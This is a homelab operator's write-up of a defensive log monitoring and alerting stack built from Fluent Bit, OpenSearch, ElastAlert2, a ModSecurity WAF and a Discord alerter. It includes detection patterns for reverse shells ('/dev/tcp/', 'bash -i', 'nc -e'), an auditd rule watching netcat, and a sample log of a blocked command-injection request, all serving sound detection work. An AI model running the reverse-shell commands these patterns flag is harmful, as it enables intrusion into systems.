Homelab Monitoring and Alerting Stack

Scope

This page documents the monitoring and alerting stack I run on my Proxmox homelab: design choices, architecture, log sources, and how alerts move from collection to notification. It focuses on how the system is built and operated, not on reproducing every config file line by line.

Passwords, webhook URLs, internal LAN maps, container IDs, and full configuration files are intentionally omitted or replaced by placeholders. Examples use fictional hostnames (git.example.com, edge-waf-01) and documentation-only addressing (10.0.10.0/24, 203.0.113.50). Nothing there describes my live infrastructure.

Why not Wazuh

I evaluated Wazuh as a full SIEM and chose to build something lighter instead. The reasons are practical, not ideological:

Resource cost: Wazuh is heavy for a single-operator homelab. Indexer, manager, and agents add ongoing CPU, RAM, and disk overhead I did not need.
CVE correlation: I do not rely on built-in vulnerability scanning in this stack. Patch management and service updates are handled separately.
Rule fit: Default Wazuh rules target generic enterprise patterns. My environment is Proxmox LXCs, Docker apps... and most default alerts would be noise.
Custom work anyway: Useful alerting still required writing or tuning rules. If I am going to maintain rules by hand, I prefer a pipeline where every alert has a clear, homelab-specific purpose.

The result is a smaller stack: Fluent Bit agents, OpenSearch for storage and search, ElastAlert2 for rule evaluation, and Discord for notifications. Less platform, more signal.

Design principles

Collect once, query everywhere: all nodes ship logs to one OpenSearch cluster.
Actionable alerts only: SSH access, WAF blocks on public vhosts, reverse shell indicators, unauthorized proxies, stack health... not every log line.
Edge-first security: internet-exposed services sit behind nginx, ModSecurity (OWASP CRS), and fail2ban. Those logs feed the same pipeline.
Lightweight agents: Fluent Bit on the hypervisor and on each monitored LXC. No heavy agent framework.
Meta-monitoring: a watchdog timer verifies OpenSearch, ElastAlert2, and Fluent Bit itself, so the monitoring stack cannot fail silently.

Architecture

Public HTTP(S) traffic hits an edge reverse proxy with a WAF. Application workloads run on separate LXCs (Docker or systemd). Every monitored node runs Fluent Bit and forwards enriched events to a central OpenSearch instance. ElastAlert2 polls OpenSearch and triggers a custom Discord alerter when rules match.

Internet (203.0.113.50)
        |
        v
+------------------+
| edge-waf-01      |  nginx + ModSecurity + fail2ban
| (public vhosts)  |
+--------+---------+
         | reverse proxy
         v
+------------------+
| app-node-01      |  Docker / systemd (Forgejo-like apps)
| app-node-02      |  other self-hosted services
+------------------+

Proxmox host + monitored LXCs
        |
        |  Fluent Bit (journald, docker, nginx/modsec, audit)
        v
+------------------+
| monitoring-core  |  OpenSearch + Dashboards (Docker)
+--------+---------+
         |
         +--- OpenSearch Dashboards  (search / Discover)
         |
         +--- ElastAlert2             (YAML rules, realert throttling)
         |         |
         |         v
         |    Discord alerter         (REDACTED webhook)
         |
         +--- watchdog timer          (stack health alerts)

Separate: pve-notifier on hypervisor -> Telegram (Proxmox login events)

Stack components

Fluent Bit

Runs on the Proxmox host and on each monitored LXC. Tails journald, Docker json logs, nginx and ModSecurity files on edge nodes, and audit events where available. Lua filters add readable summary fields, event_type, and security tags such as web_exploit_event or reverse_shell_event.

OpenSearch + Dashboards

Central log store on monitoring-core. Daily indices (logs-YYYY.MM.DD), authenticated API, and a saved Discover view for day-to-day investigation. Grafana on the same node handles metrics - logs and metrics stay separate by design.

ElastAlert2

Evaluates YAML rules every minute against OpenSearch. Supports any, frequency, and throttling via realert. Severity is encoded in the rule title (for example [critical], [high]) and parsed by the alerter script.

Discord alerter

Small Python script invoked by ElastAlert2. Builds a colored embed (host, severity, summary, timestamp) and a link back to OpenSearch Dashboards filtered on the document id. Webhook URL is stored only on the server - never published.

Complementary control-plane alert: pve-notifier tails Proxmox login events and pushes Telegram notifications. It predates this logstack and still covers hypervisor access independently.

What gets collected

Edge / internet-facing: nginx access and error logs, ModSecurity audit lines (blocks and high-score anomalies), fail2ban ban events.
Identity / access: SSH accepted and failed logins via systemd journal on all monitored nodes.
Applications: Docker stdout/stderr on app LXCs (Forgejo, RSS reader, paste bin, media server, and similar).
Host security: auditd on the Proxmox hypervisor (exec of suspicious binaries, sudo, critical file writes). Limited inside unprivileged LXCs.
Custom detections (Lua): unauthorized reverse proxy or tunnel startup, WAF exploit tagging, reverse shell pattern matching in audit and Docker logs.
Environment-specific: optional inputs for routing daemons or game servers on dedicated nodes - same pipeline, different rules.

Alert categories

Category	Example trigger	Severity
Access	SSH login success	critical
Access	SSH brute force (5 failures / 5 min)	high
Web security	WAF blocks RCE or injection on public vhosts	high
Compromise	Reverse shell pattern on an app node	critical
Posture	Unauthorized reverse proxy or tunnel binary	high
Operations	Monitoring stack component down (watchdog)	critical
Informational	Game server player join (optional rule)	info

Rules are YAML files deployed alongside ElastAlert2. Each rule defines a query, optional grouping (query_key), and minimum time between repeat alerts (realert).

Example alert walkthrough

The scenarios below are fictional but structurally identical to how real events flow through the stack. Hostnames, IPs, and URIs are placeholders.

Scenario A - exploit blocked at the edge (high)

Client 198.51.100.42 sends POST /api/exec with shell metacharacters to git.example.com (hosted behind edge-waf-01).
nginx forwards the request to ModSecurity with OWASP CRS. Rule 932160 (remote command execution family) matches. ModSecurity returns HTTP 403.
A single-line ModSecurity audit entry is appended to the local audit log on edge-waf-01.
Fluent Bit tails that file. A Lua filter parses the rule id and sets web_exploit_event: true, internet_facing: true, and a human-readable summary.
The event is indexed in OpenSearch on monitoring-core within seconds.
ElastAlert2 rule web_exploit_blocked matches on the next evaluation cycle (about one minute).
The Discord alerter posts an embed: severity HIGH, host edge-waf-01, summary text, and a Discover link filtered on the document id.

Sample log line (redacted):

ModSecurity: Access denied with code 403 (phase 2). [id "932160"] [msg "Remote Command Execution: Unix Shell Code Found"] [hostname "git.example.com"] [uri "/api/exec"] [unique_id "REDACTED"]

Matching ElastAlert2 rule excerpt:

name: Web Exploit Blocked
type: any
index: logs-*
filter:
  - query:
      query_string:
        query: 'web_exploit_event:true AND internet_facing:true'
realert:
  minutes: 10
alert:
  - command
command: ["/opt/elastalert/discord_alert.py", "Web Exploit Blocked [high]", "{host}", "{ctid}", "{summary}", "{@timestamp}", "{_id}"]

Scenario B - post-exploitation signal (critical)

If a payload bypassed the WAF or reached an application backend directly (for example via an unsegmented internal path), a successful compromise might show up as execution patterns rather than a blocked HTTP request:

Audit or Docker logs on app-node-01 contain strings such as /dev/tcp/, bash -i, or nc -e.
Lua tagging sets reverse_shell_event: true.
ElastAlert2 rule reverse_shell_detected fires at critical severity.

Scenario A is prevention at the edge. Scenario B is detection after access. Both are needed because no WAF is perfect and not all traffic necessarily passes through the edge.

Configuration excerpts

Full configs live on the hypervisor and are not published. The snippets below show shape only.

Fluent Bit output (credentials via environment file on each node):

[OUTPUT]
    Name                  opensearch
    Match                 *
    Host                  monitoring-core.internal
    Port                  9200
    HTTP_User             ${OPENSEARCH_USER}
    HTTP_Passwd           REDACTED
    Logstash_Format       On
    Logstash_Prefix       logs

Audit rule example (hypervisor):

-a always,exit -F arch=b64 -S execve -F path=/usr/bin/nc -k suspicious_binaries

Lua tagging concept (web exploit):

-- On ModSecurity "Access denied" + RCE rule id prefix 932/933/934:
record["web_exploit_event"] = "true"
record["internet_facing"] = "true"
record["summary"] = "Exploit blocked WAF rule=" .. rule_id .. " uri=" .. uri

OpenSearch requires authentication. Dashboards, ElastAlert2, Fluent Bit, and the watchdog all read credentials from a root-only env file on the server (chmod 600).

Trade-offs and limits

auditd in LXCs: unprivileged containers often cannot load audit rules reliably. Shell detection is strongest on the hypervisor and via Docker logs on app nodes.
WAF coverage: ModSecurity only sees traffic that passes through the edge proxy. Backends reachable without the WAF are a separate hardening topic.
Rule maintenance: custom YAML and Lua require ongoing care. That is intentional - I prefer explicit rules over opaque defaults.
Alert channel: Discord is for operational notification, not incident ticketing or long-term retention.